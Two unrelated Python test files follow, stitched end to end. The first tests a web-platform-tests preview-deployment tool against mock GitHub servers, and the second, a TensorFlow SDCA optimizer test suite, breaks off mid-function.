)
child = subprocess.Popen(
[
'python',
subject,
'--host',
'http://{}:{}'.format(test_host, test_port),
'--github-project',
'test-org/test-repo',
'synchronize',
'--window',
'3000'
],
cwd=local_repo,
env=env
)
child.communicate()
lines = subprocess.check_output(
['git', 'ls-remote', 'origin'], cwd=local_repo
)
for line in lines.decode('utf-8').strip().split('\n'):
revision, ref = line.split()
if not ref or ref in ('HEAD', 'refs/heads/master'):
continue
remote_refs[ref] = revision
return child.returncode, server.actual_traffic, remote_refs
def detect(event, expected_github_traffic, expected_preview_traffic):
env = {
'DEPLOY_TOKEN': 'c0ffee'
}
env.update(os.environ)
github_server = MockServer((test_host, 0), expected_github_traffic)
github_port = github_server.server_address[1]
preview_server = MockServer((test_host, 0), expected_preview_traffic)
preview_port = preview_server.server_address[1]
with temp_repo() as repo, github_server, preview_server:
env['GITHUB_EVENT_PATH'] = repo + '/event.json'
with open(env['GITHUB_EVENT_PATH'], 'w') as handle:
handle.write(json.dumps(event))
child = subprocess.Popen(
[
'python',
subject,
'--host',
'http://{}:{}'.format(test_host, github_port),
'--github-project',
'test-org/test-repo',
'detect',
'--target',
'http://{}:{}'.format(test_host, preview_port),
'--timeout',
'1'
],
cwd=repo,
env=env
)
child.communicate()
return (
child.returncode,
github_server.actual_traffic,
preview_server.actual_traffic
)
def test_synchronize_zero_results():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_fail_search_throttled():
expected_traffic = [
(Requests.get_rate, (
200,
{
'resources': {
'search': {
'remaining': 1,
'limit': 10
}
}
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode != 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_fail_incomplete_results():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [],
'incomplete_results': True
}
))
]
returncode, actual_traffic, remove_refs = synchronize(expected_traffic)
assert returncode != 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_closed():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': '2019-10-28',
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_sync_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
)),
(Requests.ref_create_open, (200, {})),
(Requests.ref_create_trusted, (200, {})),
(Requests.deployment_get, (200, {})),
(Requests.deployment_create, (200, {}))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_collaborator_bot():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'chromium-wpt-export-bot'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_ignore_untrusted_contributor():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'CONTRIBUTOR'
}
],
'incomplete_results': False
}
))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_sync_trusted_contributor():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (
200,
{
'items': [
{
'number': 23,
'labels': [{'name': 'safe for preview'}],
'closed_at': None,
'user': {'login': 'Hexcles'},
'author_association': 'CONTRIBUTOR'
}
],
'incomplete_results': False
}
)),
(Requests.ref_create_open, (200, {})),
(Requests.ref_create_trusted, (200, {})),
(Requests.deployment_get, (200, [])),
(Requests.deployment_create, (200, {}))
]
returncode, actual_traffic, remote_refs = synchronize(expected_traffic)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_update_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
)),
(Requests.deployment_get, (200, [])),
(Requests.ref_update_open, (200, {})),
(Requests.ref_update_trusted, (200, {})),
(Requests.deployment_create, (200, {}))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_update_member():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': None,
'user': {'login': 'grace'},
'author_association': 'MEMBER'
}
],
'incomplete_results': False
}
)),
(Requests.deployment_get, (200, [{'some': 'deployment'}])),
(Requests.ref_update_open, (200, {})),
(Requests.ref_update_trusted, (200, {}))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
def test_synchronize_delete_collaborator():
expected_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.search, (200,
{
'items': [
{
'number': 23,
'labels': [],
'closed_at': '2019-10-30',
'user': {'login': 'grace'},
'author_association': 'COLLABORATOR'
}
],
'incomplete_results': False
}
))
]
refs = {
'refs/pull/23/head': 'HEAD',
'refs/prs-open/23': 'HEAD~',
'refs/prs-trusted-for-preview/23': 'HEAD~'
}
returncode, actual_traffic, remote_refs = synchronize(expected_traffic, refs)
assert returncode == 0
assert same_members(expected_traffic, actual_traffic)
assert list(remote_refs) == ['refs/pull/23/head']
def test_detect_ignore_unknown_env():
expected_github_traffic = []
expected_preview_traffic = []
event = {
'deployment': {
'id': 24601,
'environment': 'ghosts',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 0
assert len(actual_github_traffic) == 0
assert len(actual_preview_traffic) == 0
def test_detect_fail_search_throttled():
expected_github_traffic = [
(Requests.get_rate, (
200,
{
'resources': {
'core': {
'remaining': 1,
'limit': 10
}
}
}
))
]
expected_preview_traffic = []
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert actual_github_traffic == expected_github_traffic
assert actual_preview_traffic == expected_preview_traffic
def test_detect_success():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_success, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (200, 3232))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 0
assert actual_github_traffic == expected_github_traffic
assert actual_preview_traffic == expected_preview_traffic
def test_detect_timeout_missing():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_error, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (404, {}))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert expected_github_traffic == actual_github_traffic
ping_count = len(actual_preview_traffic)
assert ping_count > 0
assert actual_preview_traffic == expected_preview_traffic * ping_count
def test_detect_timeout_wrong_revision():
expected_github_traffic = [
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_pending, (200, {})),
(Requests.get_rate, Responses.no_limit),
(Requests.deployment_status_create_error, (200, {}))
]
expected_preview_traffic = [
(Requests.preview, (200, 1234))
]
event = {
'deployment': {
'id': 24601,
'environment': 'wpt-preview-45',
'sha': '3232'
}
}
returncode, actual_github_traffic, actual_preview_traffic = detect(
event, expected_github_traffic, expected_preview_traffic
)
assert returncode == 1
assert expected_github_traffic == actual_github_traffic
ping_count = len(actual_preview_traffic)
assert ping_count > 0
assert actual_preview_traffic == expected_preview_traffic * ping_count
|
sdca_ops_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SdcaModel."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import threading
from tensorflow.contrib.linear_optimizer.python.ops.sdca_ops import SdcaModel
from tensorflow.contrib.linear_optimizer.python.ops.sparse_feature_column import SparseFeatureColumn
from tensorflow.core.example import example_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_sdca_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import googletest
_MAX_ITERATIONS = 100
_SHARD_NUMBERS = [None, 1, 3]
_NUM_LOSS_PARTITIONS = [4]
def make_example_proto(feature_dict, target, value=1.0):
e = example_pb2.Example()
features = e.features
features.feature['target'].float_list.value.append(target)
for key, values in feature_dict.items():
features.feature[key + '_indices'].int64_list.value.extend(values)
features.feature[key + '_values'].float_list.value.extend([value] *
len(values))
return e
def make_example_dict(example_protos, example_weights):
def parse_examples(example_protos):
features = {
'target':
parsing_ops.FixedLenFeature(
shape=[1], dtype=dtypes.float32, default_value=0),
'age_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'age_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32),
'gender_indices':
parsing_ops.VarLenFeature(dtype=dtypes.int64),
'gender_values':
parsing_ops.VarLenFeature(dtype=dtypes.float32)
}
return parsing_ops.parse_example(
[e.SerializeToString() for e in example_protos], features)
parsed = parse_examples(example_protos)
sparse_features = [
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['age_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['age_indices'].values, [-1]),
array_ops.reshape(parsed['age_values'].values, [-1])),
SparseFeatureColumn(
array_ops.reshape(
array_ops.split(
value=parsed['gender_indices'].indices,
num_or_size_splits=2,
axis=1)[0], [-1]),
array_ops.reshape(parsed['gender_indices'].values, [-1]),
array_ops.reshape(parsed['gender_values'].values, [-1]))
]
return dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=example_weights,
example_labels=array_ops.reshape(parsed['target'], [-1]),
example_ids=['%d' % i for i in range(0, len(example_protos))])
def make_random_examples_and_variables_dicts(num_examples, dim, num_non_zero):
random.seed(1)
sparse_features = [
SparseFeatureColumn(
[i for i in range(num_examples) for _ in range(num_non_zero)], [
i for _ in range(num_examples)
for i in random.sample(range(dim), num_non_zero)
],
[num_non_zero**(-0.5) for _ in range(num_examples * num_non_zero)])
]
examples_dict = dict(
sparse_features=sparse_features,
dense_features=[],
example_weights=[random.random() for _ in range(num_examples)],
example_labels=[
1. if random.random() > 0.5 else 0. for _ in range(num_examples)
],
example_ids=[str(i) for i in range(num_examples)])
weights = variables_lib.Variable(
array_ops.zeros([dim], dtype=dtypes.float32))
variables_dict = dict(
sparse_features_weights=[weights],
dense_features_weights=[])
return examples_dict, variables_dict
def make_variable_dict(max_age, max_gender, partitioned=False):
# TODO(sibyl-toe9oF2e): Figure out how to derive max_age & max_gender from
# examples_dict.
partitioner = None
if partitioned:
partitioner = partitioned_variables.fixed_size_partitioner(num_shards=2,
axis=0)
with variable_scope.variable_scope(
name_or_scope='variables',
partitioner=partitioner):
age_weights = variables_lib.Variable(
array_ops.zeros(
[max_age + 1], dtype=dtypes.float32))
gender_weights = variables_lib.Variable(
array_ops.zeros(
[max_gender + 1], dtype=dtypes.float32))
return dict(
sparse_features_weights=[age_weights, gender_weights],
dense_features_weights=[])
def make_dense_examples_and_variables_dicts(dense_features_values, weights,
labels):
"""Creates examples and variables dictionaries for dense features.
Variables shapes are inferred from the list of dense feature values passed as
argument.
Args:
dense_features_values: The values of the dense features
weights: The example weights.
labels: The example labels.
Returns:
One dictionary for the examples and one for the variables.
"""
dense_tensors = []
dense_weights = []
for dense_feature in dense_features_values:
dense_tensor = ops.convert_to_tensor(dense_feature, dtype=dtypes.float32)
check_shape_op = control_flow_ops.Assert(
math_ops.less_equal(array_ops.rank(dense_tensor), 2),
['dense_tensor shape must be [batch_size, dimension] or [batch_size]'])
# Reshape to [batch_size, dense_column_dimension].
with ops.control_dependencies([check_shape_op]):
dense_tensor = array_ops.reshape(
dense_tensor, [dense_tensor.get_shape().as_list()[0], -1])
dense_tensors.append(dense_tensor)
# Add variables of shape [feature_column_dimension].
dense_weights.append(
variables_lib.Variable(
array_ops.zeros(
[dense_tensor.get_shape().as_list()[1]], dtype=dtypes.float32)))
examples_dict = dict(
sparse_features=[],
dense_features=dense_tensors,
example_weights=weights,
example_labels=labels,
example_ids=['%d' % i for i in range(0, len(labels))])
variables_dict = dict(
sparse_features_weights=[], dense_features_weights=dense_weights)
return examples_dict, variables_dict
def get_binary_predictions_for_logistic(predictions, cutoff=0.5):
return math_ops.cast(
math_ops.greater_equal(predictions,
array_ops.ones_like(predictions) * cutoff),
dtype=dtypes.int32)
def get_binary_predictions_for_hinge(predictions):
return math_ops.cast(
math_ops.greater_equal(predictions, array_ops.zeros_like(predictions)),
dtype=dtypes.int32)
# TODO(sibyl-Mooth6ku): Add tests that exercise L1 and Shrinking.
# TODO(sibyl-vie3Poto): Refactor tests to avoid repetition of boilerplate code.
class SdcaModelTest(TensorFlowTestCase):
"""Base SDCA optimizer test class for any loss type."""
def _single_threaded_test_session(self):
config = config_pb2.ConfigProto(
inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
return self.test_session(use_gpu=False, config=config)
class SdcaWithLogisticLossTest(SdcaModelTest):
"""SDCA optimizer test class for logistic loss."""
def testSimple(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testPartitionedPrimals(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1, partitioned=True)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# The high tolerance in unregularized_loss comparisons is due to the
# fact that it's possible to trade off unregularized_loss vs.
# regularization and still have a sum that is quite close to the
# optimal regularized_loss value. SDCA's duality gap only ensures that
# the regularized_loss is within 0.01 of optimal.
# 0.525457 is the optimal regularized_loss.
# 0.411608 is the unregularized_loss at that optimum.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSparseRandom(self):
dim = 20
num_examples = 1000
# Number of non-zero features per example.
non_zeros = 10
# Setup test data.
with self._single_threaded_test_session():
examples, variables = make_random_examples_and_variables_dicts(
num_examples, dim, non_zeros)
options = dict(
symmetric_l2_regularization=.1,
symmetric_l1_regularization=0,
num_table_shards=1,
adaptive=False,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
for _ in range(4):
train_op.run()
lr.update_weights(train_op).run()
# Duality gap is 1.4e-5.
# It would be 0.01 without shuffling and 0.02 with adaptive sampling.
self.assertNear(0.0, lr.approximate_duality_gap().eval(), err=1e-3)
def testSparseDuplicate(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0] * 5,
'gender': [0] * 5
}, 0),
make_example_proto({
'age': [1] * 5,
'gender': [1] * 5
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
train_op = lr.minimize()
with self.assertRaisesRegexp(errors_impl.InvalidArgumentError,
'Duplicate'):
train_op.run()
def testDistributedSimple(self):
# Distributed SDCA may not converge if the workers update concurrently the
# same example. In this test the examples are partitioned across workers.
# The examples are the same for all workers, just the example_ids are
# different.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
examples = make_example_dict(example_protos, example_weights)
example_ids = array_ops.placeholder(
dtypes.string, shape=(len(example_weights),))
examples['example_ids'] = example_ids
variables = make_variable_dict(1, 1)
for num_shards in _SHARD_NUMBERS:
for num_loss_partitions in _NUM_LOSS_PARTITIONS:
with self._single_threaded_test_session():
options = dict(
# Keep the same solution as for TestSimple: since the number of
# examples is multplied by num_loss_partitions, multiply also
# L2 by the same value.
symmetric_l2_regularization=num_loss_partitions,
symmetric_l1_regularization=0,
loss_type='logistic_loss',
num_table_shards=num_shards,
num_loss_partitions=num_loss_partitions)
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
def minimize(worker_id):
with self._single_threaded_test_session():
feed_dict = {example_ids: [
str(i + worker_id*len(example_weights)) for i in range(
len(example_weights))]}
for _ in range(_MAX_ITERATIONS):
train_op.run(feed_dict=feed_dict) # pylint: disable=cell-var-from-loop
threads = []
for worker_id in range(num_loss_partitions):
threads.append(threading.Thread(target=minimize, args=(worker_id,)))
threads[-1].start()
for t in threads:
t.join()
lr.update_weights(train_op).run(feed_dict={
example_ids: [str(i) for i in range(len(example_weights))]})
# Test only the unregularized loss because the optimal value of the
# regularized loss depends on num_loss_partitions.
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.02)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertNear(0.0, lr.approximate_duality_gap().eval(), 0.02)
def testSimpleNoL2(self):
# Same as test above (so comments from above apply) but without an L2.
# The algorithm should behave as if we have an L2 of 1 in optimization but
# 0 in regularized_loss.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=0,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
self.assertAllClose(0.693147, unregularized_loss.eval())
self.assertAllClose(0.693147, loss.eval())
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
# There is neither L1 nor L2 loss, so regularized and unregularized
# losses should be exactly the same.
self.assertAllClose(0.40244, unregularized_loss.eval(), atol=0.01)
self.assertAllClose(0.40244, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testSomeUnweightedExamples(self):
# Setup test data with 4 examples, but should produce the same
# results as testSimple.
example_protos = [
# Will be used.
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 0),
# Will be used.
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
# Will be ignored.
make_example_proto({
'age': [1],
'gender': [0]
}, 1),
]
example_weights = [1.0, 0.0, 1.0, 0.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
# Only use examples 0 and 2
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllClose([0, 1, 1, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testFractionalExampleLabel(self):
# Setup test data with 1 positive, and 1 mostly-negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0.1),
make_example_proto({
'age': [1],
'gender': [1]
}, 0.9),
]
example_weights = [1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
with self.assertRaisesOpError(
'Only labels of 0.0 or 1.0 are supported right now.'):
lr.minimize().run()
def testImbalanced(self):
# Setup test data with 1 positive, and 3 negative examples.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [2],
'gender': [0]
}, 0),
make_example_proto({
'age': [3],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0, 1.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(3, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(
0.226487 + 0.102902, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.328394 + 0.131364, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0, 0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testImbalancedWithExampleWeights(self):
# Setup test data with 1 positive, and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [3.0, 1.0]
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.284860, unregularized_loss.eval(), atol=0.08)
self.assertAllClose(0.408044, loss.eval(), atol=0.012)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 1], predicted_labels.eval())
self.assertAllClose(
0.0, lr.approximate_duality_gap().eval(), rtol=2e-2, atol=1e-2)
def testInstancesOfOneClassOnly(self):
# Setup test data with 1 positive (ignored), and 1 negative example.
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [0]
}, 1), # Shares gender with the instance above.
]
example_weights = [1.0, 0.0] # Second example "omitted" from training.
for num_shards in _SHARD_NUMBERS:
with self._single_threaded_test_session():
examples = make_example_dict(example_protos, example_weights)
variables = make_variable_dict(1, 1)
options = dict(
symmetric_l2_regularization=1,
symmetric_l1_regularization=0,
num_table_shards=num_shards,
loss_type='logistic_loss')
lr = SdcaModel(examples, variables, options)
variables_lib.global_variables_initializer().run()
unregularized_loss = lr.unregularized_loss(examples)
loss = lr.regularized_loss(examples)
predictions = lr.predictions(examples)
train_op = lr.minimize()
for _ in range(_MAX_ITERATIONS):
train_op.run()
lr.update_weights(train_op).run()
self.assertAllClose(0.411608, unregularized_loss.eval(), atol=0.05)
self.assertAllClose(0.525457, loss.eval(), atol=0.01)
predicted_labels = get_binary_predictions_for_logistic(predictions)
self.assertAllEqual([0, 0], predicted_labels.eval())
self.assertAllClose(
0.01, lr.approximate_duality_gap().eval(), rtol=1e-2, atol=1e-2)
def testOutOfRangeSparseFeatures(self):
# Setup test data
example_protos = [
make_example_proto({
'age': [0],
'gender': [0]
}, 0),
make_example_proto({
'age': [1],
'gender': [1]
}, 1),
]
example_weights = [1.0, 1.0]
with self._single_threaded_test_session():
